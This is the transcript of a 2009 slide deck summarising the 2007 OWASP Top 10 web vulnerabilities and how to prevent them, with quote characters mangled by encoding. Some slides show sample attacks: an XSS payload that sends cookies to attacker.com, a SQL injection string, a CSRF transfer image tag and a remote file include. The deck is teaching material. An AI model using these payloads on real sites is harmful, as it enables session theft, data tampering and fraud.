Upgrade to Pro — share decks privately, control downloads, hide ads and more …

OWASP - Top 10

OWASP - Top 10

High level presentation of the 2007 OWASP Top 10.

Brett Hardin

October 21, 2009
Tweet

More Decks by Brett Hardin

Other Decks in Programming

Transcript

  1. What is the OWASP Top 10? ¤  10 web application

    vulnerabilities ¤  Allows organizations to have insight into why their applications have vulnerabilities ¤  Aids in understanding the consequences ¤  Good starting point to implement a secure coding strategy ¤  Not a standard! OWASP Top 10 - Brett Hardin
  2. What is the need for Application Security? ¤  75% of

    attacks target the application and not infrastructure – Gartner ¤  Attack surface is huge [millions of lines of code] ¤  A single vulnerability can lead to catastrophic failure ¤  Network controls do nothing to stop application attacks OWASP Top 10 - Brett Hardin
  3. How was it Developed? ¤  The OWASP top 10 is

    constructed from the MITRE vulnerability trends for 2006 ¤  Only focused on vulnerabilities that affect web applications ¤  Exception is cryptographic vulnerabilities ¤  Represent root cause of many privacy leaks and compliance issues (PCI) ¤  Focus is on vulnerabilities not attacks OWASP Top 10 - Brett Hardin
  4. Overview ¤  Cross-Site Scripting (XSS) ¤  Injection Flaws ¤  Malicious

    File Execution ¤  Insecure Direct Object Reference ¤  Cross Site Request Forgery ¤  Information Leakage and Improper Error Handling ¤  Broken Authentication and Session Management ¤  Insecure Cryptographic Storage ¤  Insecure Communications ¤  Failure to Restrict URL Access OWASP Top 10 - Brett Hardin
  5. A10 – Failure to Restrict URL Access Vulnerability: ¤  Having

    a page that doesn`t have the correct access control policy in place. ¤  Having a page that is lhiddenz from the users. ¤  Pages that check privileges on the client but not on the server ¤  Attackers find these pages through forceful browsing. ¤  Susceptible Pages could follow out of date access control policies. OWASP Top 10 - Brett Hardin
  6. addUser.jsp A10 – Failure to Restrict URL Access approveTransfer.jsp /Customer

    balance.jsp transfer.jsp /Admin OWASP Top 10 - Brett Hardin
  7. addUser.jsp A10 – Failure to Restrict URL Access approveTransfer.jsp /Customer

    balance.jsp transfer.jsp /Admin OWASP Top 10 - Brett Hardin
  8. addUser.jsp A10 – Failure to Restrict URL Access approveTransfer.jsp /Customer

    balance.jsp transfer.jsp /Admin OWASP Top 10 - Brett Hardin
  9. A10 – Failure to Restrict URL Access ¤  Business Risk

    ¤  Exposes functionality to unauthorized users ¤  Loss of a record trail ¤  Can potentially bypass session management ¤  Prevents good auditing from taking place OWASP Top 10 - Brett Hardin
  10. A10 – Failure to Restrict URL Access ¤  Prevention ¤ 

    Careful planning ¤  Do not assume users will be unaware of hidden functionality ¤  Block access to all file types that your application doesn`t serve ¤  Create an access control matrix ¤  Should be created for every URL and business function OWASP Top 10 - Brett Hardin
  11. Is the User Authorized if(Session[lisLoggedInz] == false) { //redirect to

    the login page } else { if(check_user_access(Session[luseridz], lPageNamez) { //display content } else { //redirect to home } } OWASP Top 10 - Brett Hardin
  12. A9 – Insecure Communications ¤  Vulnerability: ¤  Failure to secure

    sensitive transactions ¤  Not securing client-to-server connections ¤  Not securing server-to-database connections ¤  Not securing other back end connections that pass sensitive data. OWASP Top 10 - Brett Hardin
  13. A9 – Insecure Communications ¤  Business Risk ¤  Interception of

    sensitive transactions ¤  Complete confidentiality loss ¤  Can`t trust the information being sent is lsecurez ¤  Complete integrity loss ¤  Can`t trust the information received is lsecurez OWASP Top 10 - Brett Hardin
  14. A9 – Insecure Communications ¤  Prevention: ¤  Use SSL to

    encrypt network traffic from the client to the server. ¤  Encrypt backend connections, such as database connections. OWASP Top 10 - Brett Hardin
  15. A8 – Insecure Cryptographic Storage ¤  Vulnerability: ¤  Not encrypting

    sensitive information ¤  If it`s sensitive and stored it needs to be encrypted. ¤  Examples of sensitive items include: ¤  Credit cards ¤  passwords ¤  User data? OWASP Top 10 - Brett Hardin
  16. A8 – Insecure Cryptographic Storage ¤  Business risk ¤  Regulatory

    issues ¤  PCI-DSS (Requirement 3) ¤  Confidentiality loss ¤  Data protection OWASP Top 10 - Brett Hardin
  17. A8 – Insecure Cryptographic Storage ¤  Prevention: ¤  Don`t create

    your own cryptographic algorithms (homegrown) ¤  Don`t use weak algorithms (RC3,RC4, MD5, SHA-1) ¤  Generate and store private keys with care ¤  Ensure encrypted data stored is not easy to decrypt OWASP Top 10 - Brett Hardin
  18. A7 – Broken Authentication and Session Management ¤  Vulnerability ¤ 

    Failure to protect credentials ¤  User login from an unencrypted page ¤  Password reset enumeration ¤  Password/username sent in email ¤  Failure to protect session tokens ¤  Session tokens used in the URL ¤  Session tokens stored persistently in a cookie ¤  Session timeouts are too long OWASP Top 10 - Brett Hardin
  19. A7 – Broken Authentication and Session Management ¤  Business Risk

    ¤  Account hijacking ¤  Undermines authorization ¤  Breaks accountability controls ¤  Potential privacy violations OWASP Top 10 - Brett Hardin
  20. A7 – Broken Authentication and Session Management ¤  Prevention ¤ 

    Relies upon protection from Secure Communication (A9) and Cryptographic Storage (A8) ¤  DO NOT write your own session handlers! ¤  Applications should rely on robust well proven SSO or authentication systems ¤  DO NOT allow login from an unencrypted page ¤  Serve new session cookies after successful authentication ¤  Use timeouts for inactive sessions ¤  Verify the current password when using change password functionality OWASP Top 10 - Brett Hardin
  21. A6 – Information Leakage and Improper Error Handling ¤  Vulnerability:

    ¤  Unintentionally leaking information about configuration or internal workings ¤  Leaking internal state ¤  Revealing debug information to users ¤  Examples: ¤  Stack traces ¤  Failed SQL statements ¤  Path information ¤  Debug information OWASP Top 10 - Brett Hardin
  22. A6 – Information Leakage and Improper Error Handling ¤  Business

    Risk ¤  Fingerprinting servers ¤  Displaying errors can potentially lead to additional compromise ¤  SQL injection error messages can lead to Injection Flaws (A2) OWASP Top 10 - Brett Hardin
  23. A6 – Information Leakage and Improper Error Handling ¤  Prevention

    ¤  Suppress errors from users (Log them instead) ¤  Create a custom error handler ¤  Use a standard exception handling architecture ¤  Aids in different HTTP error codes from being returned ¤  Potentially use random / unique error codes ¤  Development team should use a common approach ¤  Various layers (database) may also return exceptions ¤  Overriding error codes with 200 OK OWASP Top 10 - Brett Hardin
  24. A6 – Information Leakage and Improper Error Handling import java.util.logging.Logger;

    try { //main block of code } catch (InterException e) { //handle exception Logger.getLogger(lLogNamez).log(Level.SEVERE, null, ex); } catch (Exception e) { //process the global exception } OWASP Top 10 - Brett Hardin
  25. A5 – Cross Site Request Forgery (CSRF) ¤  Vulnerability ¤ 

    Forces the victim`s browser to send a request to another established application`s session. ¤  The code is often not on the site which suffers from the vulnerability ¤  Exploits the trust a site has with the browser. ¤  WIDESPREAD! (Sleeping Giant) OWASP Top 10 - Brett Hardin
  26. A5 – Cross Site Request Forgery (CSRF) OWASP Top 10

    - Brett Hardin Banksite.com Badwebsite.com
  27. A5 – Cross Site Request Forgery (CSRF) OWASP Top 10

    - Brett Hardin Banksite.com Badwebsite.com
  28. A5 – Cross Site Request Forgery (CSRF) OWASP Top 10

    - Brett Hardin Banksite.com Badwebsite.com <img src="http://banksite.com/transfer?to_acct=4455&amt=1000">
  29. A5 – Cross Site Request Forgery (CSRF) OWASP Top 10

    - Brett Hardin Banksite.com Badwebsite.com
  30. A5 – Cross Site Request Forgery (CSRF) ¤  Business Risk

    ¤  Breaks authentication mechanisms ¤  Authorized transactions aren`t authorized ¤  Destroys record trails ¤  Prevents good auditing OWASP Top 10 - Brett Hardin
  31. A5 – Cross Site Request Forgery (CSRF) ¤  Prevention ¤ 

    Require authentication on GET/POST ¤  Use custom random tokens when making sensitive transactions ¤  Verify the submitted token is correct for the current user. ¤  Have adequate timeout`s for sessions ¤  In addition, check HTTP referrer header ¤  Check for crossdomain.xml files - flash OWASP Top 10 - Brett Hardin
  32. A4 – Insecure Direct Object Reference ¤  Vulnerability: ¤  Exposes

    a reference to an internal implementation object ¤  Database record ¤  Internal URL ¤  File ¤  Attacker modifies the direct object to access other objects OWASP Top 10 - Brett Hardin
  33. A4 – Insecure Direct Object Reference ¤  Business risk ¤ 

    Confidentiality loss ¤  Integrity loss ¤  Access data owned by other users ¤  Useful in phishing attacks OWASP Top 10 - Brett Hardin
  34. A4 – Insecure Direct Object Reference ¤  Prevention ¤  Use

    indirect reference maps ¤  Direct maps can be easily guessed ¤  Avoid exposing private objects to users ¤  If a direct object must be used ¤  Ensure the user is authorized to view the object ¤  Validate private objects with an laccept known goodz approach OWASP Top 10 - Brett Hardin
  35. A4 – Insecure Direct Object Reference Code Example: $sql =

    lSELECT * FROM accounts WHERE account_number = l + $safe_request[laccount_numberz]; OWASP Top 10 - Brett Hardin
  36. A4 – Insecure Direct Object Reference Example of Authorizing Access

    to Data: $sql = lSELECT * FROM accounts WHERE account_number = l + $safe_request[laccount_numberz] + lAND user_id = l + $authenticated_data[luser_idz]; OWASP Top 10 - Brett Hardin
  37. A3 – Malicious File Execution ¤  Vulnerability: ¤  Takes user

    input and appends it to a file stream function. ¤  File upload functionality OWASP Top 10 - Brett Hardin
  38. A3 – Malicious File Execution Client Vulnerable Server Malicious Server

    OWASP Top 10 - Brett Hardin load $_request[“filename”];
  39. A3 – Malicious File Execution Client Vulnerable Server Malicious Server

    OWASP Top 10 - Brett Hardin load $_request[“http://offsite.com/haxor.php”];
  40. A3 – Malicious File Execution Code Example: String requestURI =

    request.getRequestURI(); File file = new File(l/home/usernamez, requestURI); ServletOutputStream out = response.getOutputStream(); FileInputStream fileStream = new FileInputStream(file); byte[] buf = new byte[fileStream.available()]; fileStream.read(buf); outstream.write(buf); OWASP Top 10 - Brett Hardin
  41. A3 – Malicious File Execution ¤  Business Risk: ¤  Allows

    malicious content to execute on web application server ¤  Potentially Compromise the Server OWASP Top 10 - Brett Hardin
  42. A3 – Malicious File Execution ¤  Prevention: ¤  Don`t allow

    users to insert into server-based resources ¤  Strongly validate input using an laccept known goodz policy ¤  Add firewall rules to prevent applications from making new outbound connections ¤  Implement a sandbox to isolate applications from one another ¤  JVM security manager has been enabled OWASP Top 10 - Brett Hardin
  43. A2 – Injection Flaws ¤  Vulnerability ¤  When user supplied

    data is sent to an interpreter as part of a command or query. ¤  Vulnerability that lbreaksz out of the intended context. ¤  Types of injection flaws: ¤  SQL injection ¤  XML injection ¤  LDAP injection ¤  XPATH injection OWASP Top 10 - Brett Hardin
  44. A2 – Injection Flaws ¤  Business risk: ¤  Injection flaws

    allow an attacker to: ¤  create new db entries ¤  Read db entries ¤  Update db records ¤  delete any arbitrary data available to the application. OWASP Top 10 - Brett Hardin
  45. A2 – Injection Flaws ¤  Example: ¤  Db_query = lselect

    * from users where username =bz + username + l`z; ¤  User inserts, Brett ¤  Db_query = lselect * from users where username =bBrett`z; OWASP Top 10 - Brett Hardin
  46. A2 – Injection Flaws ¤  Example: ¤  Db_query = lselect

    * from users where username =bz + username + l`z; ¤  Attacker inserts X` or b1`=b1 ¤  Db_query = lselect * from users where username = bX` or b1`=b1`z); OWASP Top 10 - Brett Hardin
  47. A2 – Injection Flaws ¤  Prevention: ¤  Prepared Statement ¤ 

    Separates SQL logic from supplied data ¤  Validate your input ¤  Use a laccept known goodz strategy. ¤  Then sanitize (Encode/Escape) your input ¤  Convert dangerous characters to their non-dangerous counterparts. (e.g. single quote (b) becomes %27) OWASP Top 10 - Brett Hardin
  48. A2 – Injection Flaws PreparedStatement statement = databaseConnection.getPreparedStatement(); String sql

    = lSELECT * FROM users WHERE username = ?z; statement.setString(1, encode(requestParameter)); statement.execute(); OWASP Top 10 - Brett Hardin
  49. A1 – Cross Site Scripting (XSS) ¤  Vulnerability ¤  XSS

    is a type of HTML injection. ¤  XSS allows a user to insert client side scripting into a page that will be displayed back to the user. ¤  XSS exploits the trust a user has with a site. ¤  Extremely common and simple for attackers to find OWASP Top 10 - Brett Hardin
  50. A1 – Cross Site Scripting (XSS) ¤  Consider the output

    of /helloworld.cgi?name=BOB <HTML> <BODY> Hello BOB </BODY> </HTML> OWASP Top 10 - Brett Hardin
  51. A1 – Cross Site Scripting (XSS) ¤  What about? /helloworld.cgi?name=<SCRIPT

    SRC=bhttp://attacker.com/`+document.cookie></ SCRIPT> <HTML> <BODY> Hello <SCRIPT SRC=bhttp:// attacker.com/`+document.cookie></SCRIPT> </BODY> </HTML> OWASP Top 10 - Brett Hardin
  52. A1 – Cross Site Scripting (XSS) ¤  What about? /helloworld.cgi?name=<SCRIPT

    SRC=bhttp://attacker.com/`+document.cookie></ SCRIPT> <HTML> <BODY> Hello <SCRIPT SRC=bhttp:// attacker.com/`+document.cookie></SCRIPT> </BODY> </HTML> OWASP Top 10 - Brett Hardin
  53. A1 – Cross Site Scripting (XSS) ¤  What about? /helloworld.cgi?name=<SCRIPT

    SRC=bhttp://attacker.com/`+document.cookie></ SCRIPT> <HTML> <BODY> Hello &lt;SCRIPT SRC&gt;=&quot;http:// attacker.example.com/&quot; +document.cookie&lt;/ SCRIPT&gt; </BODY> </HTML> OWASP Top 10 - Brett Hardin
  54. A1 – Cross Site Scripting (XSS) ¤  What about? /helloworld.cgi?name=<SCRIPT

    SRC=bhttp://attacker.com/`+document.cookie></ SCRIPT> <HTML> <BODY> Hello &lt;SCRIPT SRC&gt;=&quot;http:// attacker.example.com/&quot; +document.cookie&lt;/ SCRIPT&gt; </BODY> </HTML> OWASP Top 10 - Brett Hardin
  55. A1 – Cross Site Scripting (XSS) ¤  Business Risk ¤ 

    XSS allows attacker to insert code into your application and present it to users on your behalf. ¤  Port-scan intranet ¤  Steal credentials ¤  Steal browser history ¤  Abuse browser vulnerabilities ¤  Log keystrokes ¤  Steal cookies ¤  lDefacez websites OWASP Top 10 - Brett Hardin
  56. A1 – Cross Site Scripting (XSS) ¤  Prevention: ¤  Strong

    output encoding/escaping ¤  Additionally: output validation ¤  Additionally: input validation OWASP Top 10 - Brett Hardin
  57. Important! ¤  No lweb applicationz scanner will be able to

    find all of the vulnerabilities in the OWASP Top 10. ¤  Developers should be fully versed in the OWASP Top 10 ¤  Prevents new code from being developed insecurely ¤  Have code reviews ¤  Hire a developer to specifically look at code from a security perspective OWASP Top 10 - Brett Hardin
  58. Repeat After Me Don`t Trust User Input, All User Input

    is Malicious! OWASP Top 10 - Brett Hardin
  59. Summary ¤  To prevent these vulnerabilities from occurring in your

    application, you need to introduce the OWASP Top 10 to your developers. ¤  An ounce of prevention is worth a pound of cure. ¤  Benjamin Franklin OWASP Top 10 - Brett Hardin